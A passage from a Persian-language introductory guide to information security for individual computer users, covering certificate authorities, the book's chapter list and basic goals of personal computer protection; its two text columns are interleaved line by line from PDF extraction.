ﺩﺭ ﺷــﺒﻜﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ،ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ ﺭﻭﺷــﻬﺎﻱ ﺷﻨﺎﺳﺎﻳﻲ ﺍﻓـﺮﺍﺩ ﻭ ﺳـﺎﺯﻣﺎﻧﻬﺎ ﺑـﻪ ﻃـﻮﺭ ﺭﺳـﻤﻲ ﮔـﻮﺍﻫﻲ ﺻـﺎﺩﺭ
ﻣﺴﺘﺤﻜﻢﺗﺮ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ. ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻣﻔﻬـﻮﻡ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ ﻧﻴـﺰ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ :ﺍﮔـﺮ
ﺩﻭﻟﺘﻬﺎ ﺩﺭ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﻭﺟﻮﺩ ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﻣﻨﺎﺳـﺐ ﺑـﺮﺍﻱ ﮔﺬﺭﻧﺎﻣﺔ ﻣﻠﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻳﻌﻨﻲ ﺩﻭﻟﺖ ﻳﻚ ﻛﺸﻮﺭ ﻫﻮﻳﺖ ﺷـﻤﺎ
ﻛﺎﺭﺍﻳﻲ ﻭ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﻣﺪﻟﻬﺎﻱ ﺟﺪﻳﺪ ﺍﻋﺘﻤﺎﺩ ﻧﻘﺶ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﺮﺩﻩ ﻭ ﻟﺬﺍ ﮔﺬﺭﻧﺎﻣﻪ ﻧﺸﺎﻧﻪﺍﻱ ﺧﻮﺍﻫﺪ ﺑﻮﺩ ﻛﻪ ﻣﻲ ﺗﻮﺍﻧﻴـﺪ
ﻣﻬﻤﻲ ﺩﺍﺭﻧﺪ .ﺍﻧﺠﺎﻡ ﺗﺮﺍﻛﻨﺸﻬﺎﻱ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻛﻮﭼﻚ ﻭ ﻣﺘﻮﺳـﻂ ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺧﻮﺩ ﺍﺯ ﺁﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ .ﺑﻄﻮﺭ ﻣﺸﺎﺑﻪ ﺍﮔﺮ
ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﺴﺘﻪ ﺑﻪ ﻭﺟﻮﺩ ﺍﻳﻦ ﺍﻋﺘﻤﺎﺩ ﺍﺳﺖ .ﺩﺭ ﺑﻌﻀﻲ ﮔﻮﺍﻫﻴﻨﺎﻣﺔ ﻭﺳﻴﻠﺔ ﻧﻘﻠﻴﺔ ﻣﻮﺗﻮﺭﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﺑـﻪ ﺍﻳـﻦ ﻣﻌﻨـﻲ
ﻛﺸﻮﺭﻫﺎ ﺩﻭﻟﺘﻬﺎ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭﻧﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻱ ﺩﻭﻟـﺖ ﺑـﺮﺍﻱ ﺷـﻤﺎ ﺍﺳﺖ ﻛﻪ ﻳﻚ ﺳـﺎﺯﻣﺎﻥ ﻣﻠـﻲ ﻳـﺎ ﻧﺎﺣﻴـﻪﺍ ﹺ
ﻣﺮﺍﻛﺰ ﺻﺪﻭﺭ ﮔﻮﺍﻫﻲ ﻋﻤﻞ ﻛﻨﻨـﺪ ﻭ ﺩﺭ ﺳـﺎﻳﺮ ﻛـﺸﻮﺭﻫﺎ ﺩﻭﻟﺘﻬـﺎ ﻣﺠﻮﺯﻱ ﺻﺎﺩﺭ ﻛﺮﺩﻩ ﻛﻪ ﻫﻢ ﻫﻮﻳﺖ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣﻲﻛﻨﺪ ﻭ ﻫـﻢ
ﻣﻌﺘﻘﺪﻧﺪ ﻛـﻪ ﻭﻇﻴﻔـﺔ ﻣﺮﺍﻛـﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺑﺎﻳـﺪ ﺑـﻪ ﺑﺨـﺶ ﺟﻮﺍﺯ ﺭﺍﻧﻨـﺪﮔﻲ ﺑـﺎ ﻳـﻚ ﻭﺳـﻴﻠﺔ ﻧﻘﻠﻴـﻪ ﺭﺍ ﺑـﻪ ﺷـﻤﺎ ﻣـﻲﺩﻫـﺪ.
ﺧﺼﻮﺻﻲ ﻭﺍﮔﺬﺍﺭ ﺷﻮﺩ .ﻣﺴﺘﻘﻞ ﺍﺯ ﺟﺰﺋﻴﺎﺕ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ،ﻫﺪﻑ ﺍﺯ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺧﺪﻣﺎﺕ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻣﻲﺩﻫﻨﺪ ﻧﻴـﺰ ﺍﺯ ﻃﺮﻳـﻖ
ﺗﺄﺳﻴﺲ ﺍﻳﻦ ﻣﺮﺍﻛـﺰ ﻭﺍﺿـﺢ ﺍﺳـﺖ .ﺳﻴﺎﺳـﺖ ﺩﻭﻟـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ ﺻﺪﻭﺭ ﻛﺎﺭﺗﻬﺎﻱ ﺍﻋﺘﺒﺎﺭﻱ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻣـﻲﻧﻤﺎﻳﻨـﺪ .ﻛﺎﺭﻓﺮﻣـﺎ ﻳـﺎ
ﻣﻜﺎﻧﻴﺰﻣﻬﺎﻱ ﺍﻳﺠﺎﺩ ﺍﻃﻤﻴﻨﺎﻥ ﺭﺍ ﺗﺴﻬﻴﻞ ﻛﻨﺪ ﺗﺎ ﺍﻓﺮﺍﺩ ،ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﺁﻣﻮﺯﺷﮕﺎﻩ ﺷﻤﺎ ﻫﻢ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺯ ﻃﺮﻳﻖ ﻳﻚ ﻛﺎﺭﺕ ﺷﻨﺎﺳـﺎﻳﻲ
ﻲ
ﻛــﺎﺭﺑﺮﺍﻥ ﻣﻨﻔــﺮﺩ ﺁﻥ ﻗــﺎﺩﺭ ﺑﺎﺷــﻨﺪ ﺩﺭ ﺗﺠــﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــ ﹺ ﺷﻤﺎ ﺭﺍ ﺗﺄﻳﻴﺪ ﻛﻨﺪ ﻭ ﺁﻥ ﻛﺎﺭﺕ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺳﺘﺮﺳﻲ ﺷﻤﺎ ﺭﺍ ﺑـﻪ
ﻛﺸﻮﺭﻫﺎﻱ ﺩﻳﮕﺮ ﻫﻢ ﻣﺸﺎﺭﻛﺖ ﻧﻤﺎﻳﻨﺪ. ﺳﺮﻭﻳﺴﻬﺎﻱ ﺧﺎﺻﻲ ﻛﻪ ﻣﺨﺼﻮﺹ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻳـﺎ ﺩﺍﻧـﺸﺠﻮﻳﺎﻥ
ﻳﻚ ﺣﻮﺯﺓ ﺧﺎﺹ ﻫﺴﺘﻨﺪ ﺑﺮﻗﺮﺍﺭ ﻧﻤﺎﻳﺪ.
ﻭﺍﺿﺢ ﺍﺳﺖ ﻛﻪ ﺗﻌﺪﺍﺩ ﻣﺮﺍﻛﺰ ﺻـﺪﻭﺭ ﮔـﻮﺍﻫﻲ ﺩﺭ ﺩﻧﻴـﺎﻱ ﻭﺍﻗﻌـﻲ
ﺍﻧﺪﻙ ﻫﺴﺘﻨﺪ .ﺑﻄﻮﺭ ﻛﻠﻲ ﻫﺮﻳﻚ ﺍﺯ ﺍﻳـﻦ ﻣﺮﺍﻛـﺰ ﺍﺯ ﺗﺄﻳﻴـﺪ ﺷـﻤﺎ
ﻫﺪﻑ ﺧﺎﺻﻲ ﺭﺍ ﺩﺭﻧﻈﺮ ﻣﻲﮔﻴﺮﻧﺪ .ﺟﺎﻣﻌﻴﺖ ﺗﺄﻳﻴﺪ ﻫﻮﻳﺖ ﺍﺯ ﻳـﻚ
ﻓﺼﻞ .۱ﻣﻘﺪﻣﻪ
ﻓﺼﻞ .۲ﺩﺭﻙ ﻣﻔﺎﻫﻴﻢ ﺍﻣﻨﻴﱵ
ﻓﺼﻞ .۳ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ
ﻓﺼﻞ .۴ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﻭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ
ﻓﺼﻞ .۵ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﳐﺮﺏ
ﻓﺼﻞ .۶ﺍﻣﻨﻴﺖ ﺧﺪﻣﺎﺕ ﺷﺒﻜﻪ
ﻓﺼﻞ .۷ﺍﺑﺰﺍﺭﻫﺎﻳﻲ ﺑﺮﺍﻱ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ
ﻓﺼﻞ .۸ﻧﻜﺎﺕ ﻭﻳﮋﻩ ﺑﺴﺘﺮﻫﺎﻱ ﳐﺘﻠﻒ
ﺿﻤﻴﻤﻪ .۱ﺁﺷﻨﺎﻳﻲ ﺑﺎ ﻛﺪﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺬﺍﺭﻱ
TCP/IP ﺿﻤﻴﻤﻪ.۲
ﺿﻤﻴﻤﻪ .۳ﻭﺍﮊﻩﻧﺎﻣﻪ ﺍﺻﻄﻼﺣﺎﺕ ﻓﲏ
ﺭﻭﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ ﻳــﺎ ﭘﺎﻳﮕﺎﻫﻬــﺎﻱ ﻭﺑــﻲ ﻛــﻪ ﺑــﻪ ﺁﻧﻬــﺎ •
ﺩﺳﺘﺮﺳﻲ ﺩﺍﺭﻳﺪ ﻛﺴﻲ ﻗﺎﺩﺭ ﺑﻪ ﺳـﺮﻗﺖ ﻧـﺎﻡ ﻛـﺎﺭﺑﺮﻱ ١ﻭ
ﺭﻣﺰ ﻋﺒﻮﺭ ٢ﻧﻴﺴﺖ؛
ﭼﻨﺎﻧﭽﻪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑـﻪ •
ﺣﺴﺎﺏ ﺑـﺎﻧﻜﻲ ﺧـﻮﺩ ﺭﺍ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﺔ ﺍﻳﻨﺘﺮﻧـﺖ ﻭﺍﺭﺩ ﻓﺼﻞ ﺍﻭﻝ
ﻛﻨﻴــﺪ ،ﺩﺍﺩﻩﻫــﺎﻱ ﻣﺮﺑﻮﻃــﻪ ﺍﺯ ﺍﻣﻨﻴــﺖ ﻛﺎﻣــﻞ ﺑﺮﺧــﻮﺭﺩﺍﺭ ﻣﻘﺪﻣﻪ
ﺧﻮﺍﻫﻨﺪ ﺑﻮﺩ )ﻣﺴﻠﻤﹰﺎ ﺷﻤﺎ ﺑﺮ ﺁﻧﭽـﻪ ﻛـﻪ ﺩﺭ ﺳـﻮﻱ ﺩﻳﮕـﺮ ﺷـﺒﻜﺔ
ﺍﺭﺗﺒﺎﻃﻲ ﺭﺥ ﻣﻲﺩﻫﺪ ﻛﻨﺘﺮﻟﻲ ﻧﺨﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ(؛ ﺗﺄﻛﻴﺪ ﺑﺨﺶ ﺩﻭﻡ ﺑﻴﺸﺘﺮ ﺑﺮ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻨﻔـﺮﺩ ﺭﺍﻳﺎﻧـﻪ
ﺍﺳﺖ -ﺍﺯ ﻣﺒﺘﺪﻳﺎﻥ ﮔﺮﻓﺘﻪ ﺗﺎ ﻛﺎﺭﺷﻨﺎﺳﺎﻥ؛ ﻭ ﺍﻭﻟﻴﻦ ﻣﺴﺌﻠﻪﺍﻱ ﻛﻪ
ﻭ ... •
ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺑﺎﻳــﺪ ﺷــﺮﺡ ﺩﺍﺩﻩ ﺷــﻮﺩ ﭼﮕــﻮﻧﮕﻲ ﺣﻔﺎﻇــﺖ ﺍﺯ
ﭼﻨﺎﻧﭽﻪ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﺭﺍﻳﺎﻧﻪ ﻫـﺎﻱ ﺷﺨـﺼﻲ ﻧﺎﺩﻳـﺪﻩ ﮔﺮﻓﺘـﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺳﺖ.
ﺷﻮﻧﺪ ﭘﻴﺎﻣﺪﻫﺎﻱ ﮔﻮﻧﺎﮔﻮﻧﻲ ﺑﻪ ﺑﺎﺭ ﻣـﻲﺁﻳـﺪ :ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﻳـﻦ
ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ؛ ﻭﻟـﻲ ﺍﻳﻨﻜـﺎﺭ ﺑـﻪ
ﭘﻴﺎﻣﺪﻫﺎ ﻣﻨﺠﺮ ﺑـﻪ ﺁﺯﺍﺭ ﺷـﺨﺺ ﮔﺮﺩﻧـﺪ ﻭﻟـﻲ ﻫﺰﻳﻨـﻪﺍﻱ ﺩﺭ ﺑـﺮ
ﺍﻃﻼﻋﺎﺕ ،ﺯﻳﺮﻛﻲ ﻭ ﻣﺮﺍﻗﺒﺖ ﺷﺪﻳﺪ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺯﺑﺎﻥ ﺑﻜﺎﺭ ﺭﻓﺘﻪ ﺩﺭ
ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ ،ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺗﺤﻤﻴـﻞ ﻛﻨﻨـﺪ ﻭ ﻭﻗـﺖ
ﺍﻳﻦ ﺑﺤﺚ ﺑﻌﻀﹰﺎ ﺣﺎﻭﻱ ﻣﻔﺎﻫﻴﻢ ﻧﺎﻣﺄﻧﻮﺳﻲ ﻣـﻲﺑﺎﺷـﺪ .ﺑﻌـﻀﻲ ﺍﺯ
ﺑﺴﻴﺎﺭ ﺯﻳـﺎﺩﻱ ﺭﺍ ﺑـﻪ ﺧـﻮﺩ ﺍﺧﺘـﺼﺎﺹ ﺩﻫﻨـﺪ .ﺩﺭ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ
ﺍﺻﻄﻼﺣﺎﺕ ﻭ ﺗﻌﺎﺭﻳﻒ ﺩﺭ ﺿﻤﻴﻤﺔ ﺍﻧﺘﻬﺎﻱ ﺍﻳﻦ ﺑﺨﺶ ﺁﻣﺪﻩﺍﻧـﺪ ﻭ
ﺣﻔﺎﻇﺖ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺑﻌﻨﻮﺍﻥ ﺣﺮﻓﺔ ﺷﺨﺺ ﻗﻠﻤﺪﺍﺩ ﻣﻲﺷـﻮﺩ ﻣﻤﻜـﻦ
ﺑﻌﻀﻲ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺰ ﺩﺭ ﭘﻴﻮﺳﺖ ۱ﻛﺘﺎﺏ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﻃﺮﺡ ﺷﺪﻩﺍﻧﺪ.
ﺍﺳﺖ ﻣﺸﻜﻞ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺑﺎﻋﺚ ﺑﻪ ﺧﻄﺮ ﺍﻓﺘﺎﺩﻥ ﻣﻮﻗﻌﻴﺖ ﺷﻐﻠﻲ
ﻭﻱ ﮔﺮﺩﺩ .ﺩﺭ ﺗﻤﺎﻣﻲ ﻣﻮﺍﺭﺩ ﺷﺨﺺ ﺑﺎﻳـﺪ ﺑـﻪ ﺍﺭﺯﻳـﺎﺑﻲ ﺍﺣﺘﻤـﺎﻝ ﺍﻭﻟﻴﻦ ﮔﺎﻡ ﺩﺭ ﺍﺭﺍﺋﻪ ﻳﻚ ﺍﺳﺘﺮﺍﺗﮋﻱ ﺻﺤﻴﺢ ﺍﻣﻨﻴﺘﻲ ﺍﻳﻦ ﺍﺳﺖ ﻛـﻪ
ﺧﻄﺮ ﺑﭙﺮﺩﺍﺯﺩ ﻭ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﻻﺯﻡ ﺭﺍ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﻭ ﺁﻧـﺮﺍ ﺍﺟـﺮﺍ ﻣﻔﻬﻮﻡ "ﻛﺎﺭﺑﺮﺩ ﺻﺤﻴﺢ" ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﻭ "ﺣﻔﺎﻇﺖ" ﺍﺯ ﺁﻧﻬـﺎ
ﻧﻤﺎﻳﺪ .ﺑﺎ ﺗﻮﺟﻪ ﺑﻪ ﺟﺰﺋﻴـﺎﺗﻲ ﻛـﻪ ﺩﺭ ﺭﺍﺑﻄـﻪ ﺑـﺎ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﻣﺸﺨﺺ ﺷﻮﺩ .ﺍﮔﺮ ﺷـﻤﺎ ﻧﻴـﺰ ﺑـﺪﻧﺒﺎﻝ ﻫﻤـﻴﻦ ﻣـﺴﺌﻠﻪ ﻫـﺴﺘﻴﺪ،
ﺍﻃﻼﻋﺎﺕ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳﺖ ﺍﻳﻦ ﺍﻣﻜﺎﻥ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺑﺘـﻮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ:
ﺗﻤﺎﻣﻲ ﺟﻮﺍﻧﺐ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺭﺍ ﻛﻨﺘﺮﻝ ﻧﻤﻮﺩ. ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﺘﺎﻥ ﺗﻨﻬﺎ ﺩﺭﺻﻮﺭﺗﻲ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ﻳـﺎ •
ﭼﻨﺎﻧﭽﻪ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﺍﺭﺍﺋﻪﺷﺪﻩ ﺩﺭ ﺍﻳﻦ ﻛﺘﺎﺏ ﻧﻴـﺰ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﭘﺎﻙ ﻣﻲﺷﻮﻧﺪ ﻛﻪ ﺷﻤﺎ ﭼﻨﻴﻦ ﺧﻮﺍﺳﺘﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ؛
ﺷﻮﻧﺪ ﻣﻲﺗﻮﺍﻥ ﺍﺣﺘﻤﺎﻝ ﺧﻄﺮ ﺭﺍ ﺗﺎ ﺣﺪ ﻗﺎﺑﻞ ﻗﺒﻮﻟﻲ ﻛﺎﻫﺶ ﺩﺍﺩﻩ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪ ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻃﺮﺍﺡ ﻳﺎ ﺑﺮﻧﺎﻣﻪﻧﻮﻳﺲ ﺁﻧﺮﺍ •
ﺍﺯ ﺟﻬﺎﻥ ﺩﺭﺣﺎﻝ ﺗﻐﻴﻴﺮ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﺍﺳﺘﻔﺎﺩﺓ ﺑﻬﻴﻨﻪ ﻧﻤﻮﺩ. ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﻋﻤﻞ ﻣﻲﻛﻨﻨﺪ )ﻣﮕﺮ ﻋﻴﺐ ﻭ ﻧﻘﺼﻬﺎﻱ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ،
ﻃﺒﻴﻌﺘﹰﺎ ﺍﺭﺍﺋﻪ ﺗﻤﺎﻣﻲ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻫـﺎﻱ ﺷﺨـﺼﻲ ﺻـﺪﻫﺎ ﻛﻪ ﻭﺟﻮﺩ ﺁﻧﻬﺎ ﺩﺭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻧﺎﺧﻮﺍﺳﺘﻪ ﺍﺳﺖ(؛
ﺻﻔﺤﻪ ﻣﻄﻠﺐ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ ،ﺍﻣﺎ ﻣﺨﺎﻃﺒﻴﻦ ﻏﺎﻟﺒﹰﺎ ﻫﻴﭽﻜﺲ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﺟﺎﺯﺓ ﺷﻤﺎ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ،ﺭﺍﻳﺎﻧـﻪ ﻭ •
ﺗﻤﺎﻳﻞ ﭼﻨﺪﺍﻧﻲ ﺑﻪ ﻣﻄﺎﻟﻌﻪ ﻣﻄﺎﻟﺐ ﺍﻧﺒﻮﻩ ﻧﺪﺍﺭﻧـﺪ .ﺩﺭ ﺍﻳـﻦ ﻧﻮﺷـﺘﻪ ﺷﺒﻜﺔ ﺷﻤﺎ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ؛
ﺧﻼﺻــﻪﺍﻱ ﺍﺯ ﺍﻃﻼﻋــﺎﺕ ﻻﺯﻡ ﺑــﺮﺍﻱ ﻛــﺎﺭﺑﺮﺍﻥ ﺟﻬــﺖ ﺩﺭﻙ ﻭ
ﺭﺍﻳﺎﻧﻪ ﺑﻄـﻮﺭ ﻧﺎﺧﻮﺍﺳـﺘﻪ ﻓﺎﻳﻠﻬـﺎﻱ ﺁﻟـﻮﺩﻩ ﺑـﻪ ﻭﻳـﺮﻭﺱ ﺭﺍ •
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ ﺍﺭﺍﺋﻪ ﺷﺪﻩ ﺍﺳـﺖ.
ﻣﻨﺘﺸﺮ ﻧﻤﻲﻛﻨﺪ؛
ﻣﺮﺍﺟﻊ ﺫﻛﺮﺷﺪﻩ ﺩﺭ ﺑﺨﺶ ﺿﻤﺎﻳﻢ ﺷـﺎﻣﻞ ﻣﻨـﺎﺑﻊ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ،
ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺮﺗﺒﻂ ،ﻭ ﻣﺴﺘﻨﺪﺍﺕ ﭼﺎﭘﻲ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﻛﻤﻜﻬـﺎﻱ ﻛﺴﻲ ﻗﺎﺩﺭ ﺑﻪ ﻣـﺸﺎﻫﺪﺓ ﺗﻐﻴﻴﺮﺍﺗـﻲ ﻛـﻪ ﺩﺭ ﺭﺍﻳﺎﻧـﻪ ﺍﻳﺠـﺎﺩ •
ﻣﻔﻴﺪﻱ ﺑﺎﺷﻨﺪ ﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﻪ ﻣﻄﺎﻟﻌﺔ ﺑﻴﺸﺘﺮ ﻧﻜﺎﺕ ﺍﻣﻨﻴﺘﻲ ﻓﻨﺎﻭﺭﻱ ﻣﻲﻛﻨﻴﺪ ﻧﻴﺴﺖ؛
ﺍﻃﻼﻋﺎﺕ ﺗﺸﻮﻳﻖ ﻧﻤﺎﻳﻨﺪ. ﻛــﺴﻲ ﺗﻮﺍﻧــﺎﻳﻲ ﺩﺳــﺘﻴﺎﺑﻲ ﺑــﻪ ﺩﺍﺩﻩﻫــﺎﻱ ﺷــﻤﺎ ،ﭼــﻪ ﺩﺭ •
ﺷﺒﻜﻪﻫﺎﻱ ﺑﻲﺳﻴﻢ ﻭ ﭼﻪ ﺩﺭ ﺷﺒﻜﻪﻫﺎﻱ ﺳﻴﻤﻲ ﺭﺍ ﻧﺪﺍﺭﺩ؛
1 Username
2 Password
٤٩ ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﻭﺏ ﺍﻧﺠﺎﻡ ﺧﺮﻳﺪﻫﺎﻱ ﺑﺮﺧﻂ ،٤ﮔﺰﺍﺭﺷﻬﺎﻱ ﻛﺎﺭﻱ ﻣﻬﻢ ﻭ ﺗﻜﺎﻟﻴﻒ ﻣﺤﺪﻭﺩﻳﺖ ﺯﻣﺎﻥ ﻭ ﻫﺰﻳﻨﻪ -ﺑﻌﻀﻲ ﺍﻓﺮﺍﺩ ﺗﺼﻮﺭ ﻣﻲ ﻛﻨﻨﺪ •
ﺩﺭﺳﻲ ﻛﻪ ﺍﺭﺯﺵ ﺁﻧﻬﺎ ﻣﻌﺎﺩﻝ %۵۰ﻧﻤﺮﺍﺕ ﺩﺭﺳﻬﺎﻱ ﺗﺮﻡ ﺟـﺎﺭﻱ ﺍﻗﺪﺍﻣﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺟﻬﺖ ﻃﺮﺍﺣﻲ ،ﻛﺪ ﻧﻮﻳﺴﻲ ﻭ ﺁﺯﻣﺎﻳﺶ ﺩﺭ
ﺷﻤﺎ ﺍﺳﺖ. ﻃﻮﻝ ﻓﺮﺁﻳﻨﺪ ﺗﻮﻟﻴﺪ ﻧﺮﻡﺍﻓﺰﺍﺭ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺩﺭ ﺑﺮ ﺩﺍﺷـﺘﻪ ﻭ
ﺯﻣﺎﻥ ﺯﻳﺎﺩﻱ ﺭﺍ ﺑﻪ ﺧﻮﺩ ﺍﺧﺘﺼﺎﺹ ﻣﻲﺩﻫﺪ.
...ﺷﺨﺼﻲ ﻟﺤﻈﻪ ﺑﻪ ﻟﺤﻈﻪ ﻫﺮ ﺁﻧﭽﻪ ﺭﺍ ﻛﻪ ﺷﻤﺎ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺍﻧﺠـﺎﻡ
ﻣﻲﺩﻫﻴﺪ ﻣﺸﺎﻫﺪﻩ ﻛﻨﺪ ﻭ ﺑﻪ ﺧﺎﻃﺮ ﺑﺴﭙﺎﺭﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﺷﻤﺎﺭﺓ ﻛﺎﺭﺕ ﺑــﻲﻧﻈﻤــﻲ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ -ﺩﺭ ﻛﺎﺭﻫــﺎﻱ ﻣﺮﺑــﻮﻁ ﺑــﻪ •
ﺍﻋﺘﺒﺎﺭﻱ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻣﻲﻛﻨﻴﺪ ﺍﺯ ﺁﻥ ﺁﮔﺎﻩ ﺷﻮﺩ ،ﺍﺯ ﮔﺸﺖ ﻭ ﮔـﺬﺍﺭ ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﻲ ﺍﺷــﺘﺒﺎﻫﺎﺕ ﻣــﺸﺎﺑﻪ ﭼﻨــﺪﻳﻦ ﺑــﺎﺭ ﺗﻜــﺮﺍﺭ
ﺷﻤﺎ ﺩﺭ ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻣﺨﺘﻠـﻒ ﻣﻄﻠـﻊ ﺑﺎﺷـﺪ ،ﻭ ﺯﻣﺎﻧﻴﻜـﻪ ﺑـﺎ ﻣﻲﺷﻮﻧﺪ ﻭ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﻣﻲﮔﺮﺩﻧﺪ.
